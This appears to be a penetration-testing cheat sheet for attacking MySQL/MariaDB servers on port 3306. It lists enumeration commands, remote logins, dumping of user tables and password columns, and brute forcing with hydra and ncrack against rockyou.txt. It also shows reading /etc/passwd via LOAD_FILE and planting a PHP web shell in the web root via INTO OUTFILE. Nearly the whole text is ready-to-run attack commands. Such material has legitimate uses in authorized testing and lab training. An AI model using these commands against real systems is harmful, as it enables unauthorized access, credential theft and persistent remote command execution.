3306 - MySQL | d4t4s3c hacks & pills

Information

Default Port: 3306

PORT     STATE SERVICE
3306/tcp open  mysql                                                                                                       

Enumeration

nc -vn 192.168.1.2 3306
timeout 0.1 bash -c "nc -nv 192.168.1.2 3306"

nmap -p3306 -sS 192.168.1.2
nmap -p3306 -sVC 192.168.1.2

Install Client

# mysql
apt install -y mariadb-client
# mysqlshow
apt install -y mariadb-client-compat

Connect

# localhost
mysql -u root -p
mysql -u root --password="dbpassw1234"
# remote
mysql -h 192.168.1.2 -u root -p
mysql -h 192.168.1.2 -u root --password="dbpassw1234"
# disable tls
# ERROR 2002 (HY000): Received error packet before completion of TLS handshake.
mysql -h 192.168.1.2 -u root -p --skip-ssl
mysql -h 192.168.1.2 -u root --password="dbpassw1234" --skip-ssl

Databases

List

# mysql
MariaDB [(none)]> show databases;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234"
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" --ssl=DISABLED

Enter

MariaDB [(none)]> use wordpress;

Tables

List

# mysql
MariaDB [wordpress]> show tables;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress --ssl=DISABLED

Columns

List

# mysql
MariaDB [none]> use wordpress;
MariaDB [wordpress]> describe users;
# mysqlshow
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress users
mysqlshow -h 192.168.1.2 -u root --password="dbpassw1234" wordpress users --ssl=DISABLED

Dump

# mysql
MariaDB [wordpress]> select * from users;                # all
MariaDB [wordpress]> select name,password from users;    # filter
# mysql (one liner)
mysql -h 192.168.1.2 -u root --password="dbpassw1234" -e "select * from users" wordpress
mysql -h 192.168.1.2 -u root --password="dbpassw1234" -e "select * from users" wordpress --skip-ssl

Brute Force

hydra -t 64 -l root -P rockyou.txt mysql://192.168.1.2
ncrack --user root -P rockyou.txt mysql://192.168.1.2:3306

Functions

# command (system)
MariaDB [(none)]> system id
# command (!)
MariaDB [(none)]> \! id
# read files
MariaDB [(none)]> SELECT LOAD_FILE('/etc/passwd');
# rce
MariaDB [(none)]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php";

Files

/home/<USER>/.mysql_history
/root/.mysql_history